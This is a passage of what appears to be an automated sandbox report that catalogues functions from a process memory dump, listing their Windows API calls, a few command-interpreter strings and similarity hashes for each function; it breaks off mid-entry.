Function 00344E94, Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00342F2C,-00000001,-00000001,-00000001,-00000001), ref: 00344ED6
longjmp.MSVCRT(0036B8B8,00000001,?,00000104,00000000,?,?,00342F2C,-00000001,-00000001,-00000001,-00000001), ref: 0034F016
_get_osfhandle.MSVCRT ref: 0034F01E
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00342F2C,-00000001,-00000001,-00000001,-00000001), ref: 0034F02C

Part of subcall function 00340178: _get_osfhandle.MSVCRT ref: 00340183
Part of subcall function 00340178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0034D6A1), ref: 0034018D

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
String ID:
API String ID: 1629431960-0
Opcode ID: be43be60cd491f9519c6d72b6a1b2280ecd22d7aa5deca1c8c1817c6f2412bc4
Instruction ID: 3a728df3844a5fdbe5c9293d26dbf9e0e395913ba5ceaf005afe2e856ac2a7d9
Opcode Fuzzy Hash: be43be60cd491f9519c6d72b6a1b2280ecd22d7aa5deca1c8c1817c6f2412bc4
Instruction Fuzzy Hash: C621CF71A003059FE7229F75E845B7AB7E8EF54711F14493EE94ACF242EA75E8408B41

Uniqueness

Uniqueness Score: -1.00%

Function 0035997C, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 003599B8

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,00332178,00310030), ref: 003599FC
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00332178,00310030), ref: 00359A2E
??_V@YAXPAX@Z.MSVCRT ref: 00359A3E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$DriveFullNamePathType
String ID:
API String ID: 3442494845-0
Opcode ID: 20f91e7d237eec24cf83325257f38d8cb10b1165c846f58ce2e832d483ccdffc
Instruction ID: 13842bf2b3076b4d1fa365e0cf67321cdee34d26214a53ee7e7158f06f8bf8db
Opcode Fuzzy Hash: 20f91e7d237eec24cf83325257f38d8cb10b1165c846f58ce2e832d483ccdffc
Instruction Fuzzy Hash: B0214471A0011DEBDB22DFE4EC89BBEB7B8EB04305F0401AAA905E7151D734DE488B91

Uniqueness

Uniqueness Score: -1.00%

Function 00355662, Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,0035C100,0000001C,00354C85), ref: 00355695
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,0035C100,0000001C,00354C85), ref: 003556B0
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 003556EF
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0035570C

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue$ErrorLastOpen
String ID:
API String ID: 4270309053-0
Opcode ID: 4105f255e07bb7efb9c3afe83137bace1f3dbfcf00257d30b96e4368f4c0f51a
Instruction ID: 9fb16976314c74065dce5d8e8394e6f36ea8f860c9704c206ff307d5f091bde0
Opcode Fuzzy Hash: 4105f255e07bb7efb9c3afe83137bace1f3dbfcf00257d30b96e4368f4c0f51a
Instruction Fuzzy Hash: 3C217CB1D00619EFDB129FE58CA0EEEB6BCEB48701F514126FD01B6160CB30AD44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 003356AE, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 264663623ed69cae47eddb806180b80d703ef1ebf1466205a3a686eae5ae8041
Instruction ID: 8817434e26c1596898523fe344c66eb4fb7562cdc19d7046bad90c6e21aaa0e2
Opcode Fuzzy Hash: 264663623ed69cae47eddb806180b80d703ef1ebf1466205a3a686eae5ae8041
Instruction Fuzzy Hash: E211D031201604ABDB279B259C19BAF77ACEB81330F12420AFC15CB0E0DB34AD40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0035B91D, Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0035B953

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0035B98D
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0035B9A5
??_V@YAXPAX@Z.MSVCRT ref: 0035B9B9

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$DriveNamePathTypeVolume
String ID:
API String ID: 1029679093-0
Opcode ID: 0495fc3e9984e7862612ec14dcb7591943b4dd6459d37f638376b14c1d047481
Instruction ID: fcdab6438ed6809fe77d1992f36113905e83ef19dfe9049445b9652488793a7f
Opcode Fuzzy Hash: 0495fc3e9984e7862612ec14dcb7591943b4dd6459d37f638376b14c1d047481
Instruction Fuzzy Hash: 5E118171A04109ABDB21DBA9EC89FBFBBB8FB44305F040069AA04D7251DB34DE48C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0035916C, Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00359185
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00358CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0035918D
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 003591A4
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 003591D1

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: File$DeleteErrorLastWrite_get_osfhandle
String ID:
API String ID: 2448200120-0
Opcode ID: 45dea3cad9fbd31a4017738b29dce86d3f4c5c3f2f4ea3833adb70bd9b3e7a89
Instruction ID: de9ca17f2819a0421d263708add277b779ddbcbb23be9482b3bbf86f878819bb
Opcode Fuzzy Hash: 45dea3cad9fbd31a4017738b29dce86d3f4c5c3f2f4ea3833adb70bd9b3e7a89
Instruction Fuzzy Hash: D811C131600226EBEB379B51EC89F7E776DEB81712F01451BFC09861B1EB709E44DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00345D59, Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00345D9D
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00345DA4

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 644b6a11dde49e7d40884112b34b3f925812e2fd2dbb7e581289d37a2aaa707d
Instruction ID: 9a416944efcbd52eb31b07f2a783a2cf56357b4e32b82bd6de1bca58f29f7103
Opcode Fuzzy Hash: 644b6a11dde49e7d40884112b34b3f925812e2fd2dbb7e581289d37a2aaa707d
Instruction Fuzzy Hash: D3114835F04D1297C6376B14581DB7F23DEDF86B10F5A0159E80B9F655CB20BD429A90

Uniqueness

Uniqueness Score: -1.00%

Function 00340100, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000800,00000800,-00000004,-00000004,?,0033EBC3), ref: 00340117
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0034011E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00340133
HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0034013A

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$Process$AllocSize
String ID:
API String ID: 2549470565-0
Opcode ID: 5e1efb8c1e59385f303e5ca7ed2120153011f150399e4439efcdb2dcafda2c8d
Instruction ID: 89592256045b380b4445951a0be8992c6c46b49bd8c97087ee33e18582e75e65
Opcode Fuzzy Hash: 5e1efb8c1e59385f303e5ca7ed2120153011f150399e4439efcdb2dcafda2c8d
Instruction Fuzzy Hash: 4301B57A300202ABC7239B55EC88F9A77ECEB94765F654521F60EDE160DB31EC94C750

Uniqueness

Uniqueness Score: -1.00%

Function 00357DF1, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,0034E18E), ref: 00357E19
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0034E18E), ref: 00357E26
FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0034E18E), ref: 00357E4A
SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,0034E18E), ref: 00357E52

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
String ID:
API String ID: 1033415088-0
Opcode ID: fc76a3e6c6f7b73a12d1096173cfefad66673a81ebf3bfbc7254bc96e61ff422
Instruction ID: 718c61fdb3ca627f6a67db7287c33ceeff07686c15cd9cb4d69b2eb5839e4d26
Opcode Fuzzy Hash: fc76a3e6c6f7b73a12d1096173cfefad66673a81ebf3bfbc7254bc96e61ff422
Instruction Fuzzy Hash: 3801B571A14219AF9B129FB4AC45EFFB7FCEF0D351F00026AF806D6150EA249D45C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00346D00, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00346D6D
__p__fmode.MSVCRT ref: 00346D83
__p__commode.MSVCRT ref: 00346D91
__setusermatherr.MSVCRT ref: 00346DB2

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1063105408-0
Opcode ID: 484e8751078751d98fdddedb1f813e37942d084d91a44d9e4de60a9c87f98f78
Instruction ID: dc234df8cb323bab0a8f5bc8f93490ca94df177863f0be1234fb15ad6be98540
Opcode Fuzzy Hash: 484e8751078751d98fdddedb1f813e37942d084d91a44d9e4de60a9c87f98f78
Instruction Fuzzy Hash: EB112174A04304CBD73B9F30E99D22437E5F703316F214A5AD0558E1F1D736A982DB12

Uniqueness

Uniqueness Score: -1.00%

Function 003343A0, Relevance: 6.0, APIs: 4, Instructions: 47fileCOMMON

Download Yara Rule

APIs

Part of subcall function 003422C0: wcschr.MSVCRT ref: 003422CC

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000), ref: 003343D5
_open_osfhandle.MSVCRT ref: 003343E9
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00334401
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0034838D

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
String ID:
API String ID: 22757656-0
Opcode ID: 3bf7053e104f862ea0c7dcbf3bb9b3d0769141b3605e6a848a3f0e628c19ad28
Instruction ID: c4274277755d064ae6b286799980eb8fdaba3e3e7088c67a8c57313185edaef6
Opcode Fuzzy Hash: 3bf7053e104f862ea0c7dcbf3bb9b3d0769141b3605e6a848a3f0e628c19ad28
Instruction Fuzzy Hash: A701DB75900220AFE3266B6CAC4DF5EBBECEB45735F11431AF938A71D0DBB028558791

Uniqueness

Uniqueness Score: -1.00%

Function 00351914, Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00351735), ref: 00351932
RtlFreeHeap.NTDLL(00000000,?,?), ref: 00351939
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00351735), ref: 00351957
RtlFreeHeap.NTDLL(00000000), ref: 0035195E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 8c114374b89a5c0e592dda772171c653527425412c6763c71adab4e0ea025eca
Instruction ID: c97fdb2c34f1c6f55ba6874c451112a0ca2e4a82e7855ef2ba3e1e60515962f5
Opcode Fuzzy Hash: 8c114374b89a5c0e592dda772171c653527425412c6763c71adab4e0ea025eca
Instruction Fuzzy Hash: 52F06272610202AFD7659FA0EC88BA5B7FCFF48316F510A2EE545C6450D774E8A5CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00343B2C, Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00343DBB), ref: 00343B33
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00343DBB), ref: 00343B3A

Part of subcall function 00343AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00343A9F), ref: 00343AB2
Part of subcall function 00343AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00343ACD
Part of subcall function 00343AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00343AD4
Part of subcall function 00343AAE: memcpy.MSVCRT ref: 00343AE3
Part of subcall function 00343AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00343AEC

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00343DBB), ref: 0034DFEA
RtlFreeHeap.NTDLL(00000000,?,00343DBB), ref: 0034DFF1

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
String ID:
API String ID: 197374240-0
Opcode ID: 748dd4ff535d785b7e23fc6f0b5b1608817d5815347dda164f8f52e41a5adb51
Instruction ID: b000c3fde73dd7a83a1c83f0aadc6dc707e3ec3161d53175b6b73d82f4a9931e
Opcode Fuzzy Hash: 748dd4ff535d785b7e23fc6f0b5b1608817d5815347dda164f8f52e41a5adb51
Instruction Fuzzy Hash: F9E0483374421267E63337B67C0EF862A9CDB49761F114156F789DE1C0DD60D990C760

Uniqueness

Uniqueness Score: -1.00%

Function 00359897, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 003598A3
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00353811,?,?,00000001,?), ref: 003598AB
_get_osfhandle.MSVCRT ref: 003598C1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00353811,?,?,00000001,?), ref: 003598C9

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: e3e012931e7194c2e2eedb4c72b0be96d3cf87e46a6f5b3826bd49ba7f47fd35
Instruction ID: 53dd67c7b96baf57d848e70b2ca9e02cbffbb18b7b2864e06af0a04b72f6657d
Opcode Fuzzy Hash: e3e012931e7194c2e2eedb4c72b0be96d3cf87e46a6f5b3826bd49ba7f47fd35
Instruction Fuzzy Hash: B9E01271940205EBEB219BA0DC0DFA977ACEB01311F100646F919C61D1DA7199449660

Uniqueness

Uniqueness Score: -1.00%

Function 00344C00, Relevance: 6.0, APIs: 4, Instructions: 17COMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00344C19
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00344C21
_get_osfhandle.MSVCRT ref: 00344C2F
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00344C37

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleMode_get_osfhandle
String ID:
API String ID: 1606018815-0
Opcode ID: b47d6f5de433465387aaea94b6fbd1423bdeabb60b69897f60f9b1d405eebe0f
Instruction ID: de4f92c0e7aeff6b9bf5a33c0ec965fc246a9d7b175aaccbfceb73cbd759494f
Opcode Fuzzy Hash: b47d6f5de433465387aaea94b6fbd1423bdeabb60b69897f60f9b1d405eebe0f
Instruction Fuzzy Hash: DEE0B672940200EFEB1A9BA0FC0DB987BFDF748301F109A0AF119831A1DBB19544DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0033ACD5, Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,0033ACAB), ref: 0033ACDE
RtlFreeHeap.NTDLL(00000000), ref: 0033ACE5
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0033ACEE
RtlFreeHeap.NTDLL(00000000), ref: 0033ACF5

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 7226083209a44460f14ab66a93669306a1a42e7366fa2a389b567e3f3879dfcd
Instruction ID: 3b2c9eb0bca5e6a21fd45ff23a5dbde62a5b6bdb2e0261416cbd98027dd1947b
Opcode Fuzzy Hash: 7226083209a44460f14ab66a93669306a1a42e7366fa2a389b567e3f3879dfcd
Instruction Fuzzy Hash: EFD09232504111ABDA623BA0AC0DBC63A2CEB4D322F410642F649C60608AB088A0CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00339429, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

Part of subcall function 0033D7D4: wcschr.MSVCRT ref: 0033D7DA

Part of subcall function 0033EEF0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,0033E5F6,?,00000000,00000000,00000000), ref: 0033EF39
Part of subcall function 0033EEF0: RtlFreeHeap.NTDLL(00000000,?,0033E5F6), ref: 0033EF40
Part of subcall function 0033EEF0: _setjmp3.MSVCRT ref: 0033EFA5

_wcsupr.MSVCRT ref: 00350A16

Part of subcall function 00342ABE: memset.MSVCRT ref: 00342B59
Part of subcall function 00342ABE: ??_V@YAXPAX@Z.MSVCRT ref: 00342C13

Strings

IF, xrefs: 00350A1D
FOR, xrefs: 00350A53

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
String ID: FOR$ IF
API String ID: 3818062306-2924197646
Opcode ID: 332f3aa84c9ff2e0177d8d3f5aca34f312b430fb292faa2f85e82c36a1155ddb
Instruction ID: 59b1806b69ad6605c76483915ac5c9439d649d798b48cff9fac71836eca05093
Opcode Fuzzy Hash: 332f3aa84c9ff2e0177d8d3f5aca34f312b430fb292faa2f85e82c36a1155ddb
Instruction Fuzzy Hash: DE515C3570030287EB2BAB388891B776296EF91719F164025ED068F6A5FB72DD85C380

Uniqueness

Uniqueness Score: -1.00%

Function 0035B2BF, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

wcschr.MSVCRT ref: 0035B377
memcpy.MSVCRT ref: 0035B3F7

Strings

&()[]{}^=;!%'+,`~, xrefs: 0035B372

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$AllocProcessmemcpywcschr
String ID: &()[]{}^=;!%'+,`~
API String ID: 3241892172-381716982
Opcode ID: 2061a78a3dbe66663dc3c1908618a9849af43fd28d0856aa24d4a92129782284
Instruction ID: a0bf14e4c74753cd3a601ecd420694ba175724f29a0b06d16b528553cf9574fc
Opcode Fuzzy Hash: 2061a78a3dbe66663dc3c1908618a9849af43fd28d0856aa24d4a92129782284
Instruction Fuzzy Hash: F6618AB4E00219CFCB2ACF69D8809ADB7F5BF48351F21452EE815EB261EB309945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0033DE4F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0033DE60

Part of subcall function 0033F300: _setjmp3.MSVCRT ref: 0033F318
Part of subcall function 0033F300: iswspace.MSVCRT ref: 0033F35B
Part of subcall function 0033F300: wcschr.MSVCRT ref: 0033F37D
Part of subcall function 0033F300: iswdigit.MSVCRT ref: 0033F3DE

Part of subcall function 003400B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000), ref: 003400C1
Part of subcall function 003400B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033DF68,00000001,?,00000000,00343458,-00000105,0035BDD8,00000240,00344B82,00000000,00000000,0034AE6E,00000000,?), ref: 003400C8

longjmp.MSVCRT(0036B8B8,00000001,00000000), ref: 0034BCF2

Strings

REM/?, xrefs: 0033DE59

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$AllocProcess_setjmp3_wcsicmpiswdigitiswspacelongjmpwcschr
String ID: REM/?
API String ID: 1631155197-4093888634
Opcode ID: 50a5e3297e01ba79cf99d5ae32b98e29623b4975da01ece883c656d4c5c1c211
Instruction ID: 2c116adcfa95c7317696eeb09c25eda597dae2e602864097469bcc9b0500a674
Opcode Fuzzy Hash: 50a5e3297e01ba79cf99d5ae32b98e29623b4975da01ece883c656d4c5c1c211
Instruction Fuzzy Hash: D021F2327103409EE727A775BDC2B6762989F80761F11943BE506CE6E1EEF4D8408B00

Uniqueness

Uniqueness Score: -1.00%

Function 00354A29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,0035C120,0000001C,00355CB1), ref: 00354A58

Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EAB7
Part of subcall function 0033EA40: iswspace.MSVCRT ref: 0033EB2D
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB49
Part of subcall function 0033EA40: wcschr.MSVCRT ref: 0033EB6D

RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 00354B28

Part of subcall function 0035587B: RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 003558AF
